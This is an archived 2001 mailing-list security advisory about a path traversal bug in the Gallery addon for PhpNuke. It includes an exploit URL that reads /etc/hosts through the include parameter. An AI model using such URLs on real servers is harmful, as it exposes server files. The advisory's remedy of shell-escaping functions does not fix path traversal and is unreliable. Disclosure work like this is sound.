Gallery Addon for PhpNuke remote file viewing vulnerability
From: Cabezon Aurélien (aurelien.cabezon@isecurelabs.com)Date: 11/18/01
- Previous message: Florian Weimer: "Re: Analysis of SSH crc32 compensation attack detector exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Message-ID: <004001c16fd7$6aeb45a0$c5cf80d9@London> From: Cabezon Aurélien <aurelien.cabezon@isecurelabs.com> To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org> Subject: Gallery Addon for PhpNuke remote file viewing vulnerability Date: Sun, 18 Nov 2001 03:18:26 +0100
Gallery Addon for PhpNuke remote file viewing vulnerability
Problem discovered: 18/10/2001 by Cabezon Aurélien |
aurelien.cabezon@iSecureLabs.com
[1] Description
Gallery is an intuitive web based photo gallery with authenticated users and
privileged albums.
Photo management includes automatic thumbnails, resizing, rotation, etc.
Gallery is available as a Nuke 5.0 module.
Gallery Addon is vulnerable to the ../.. bug that allow remote file reading
on the web server as whatever
user runs the web server.
[2] Exploit
http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&
name=gallery&file=index&inclu
de=../../../../../../etc/hosts
[3] Fix
Coder has been alerted.
An easy way to fix such a vulnerability is to use the PHP included "system
escapeshell" function.
[4] Informations bout Gallery Addon for PhpNuke
http://www.menalto.com/projects/gallery-nuke/
Author: bharat@menalto.com
--- Cabezon Aurélien http://www.iSecureLabs.com aurelien.cabezon@iSecureLabs.
- Previous message: Florian Weimer: "Re: Analysis of SSH crc32 compensation attack detector exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
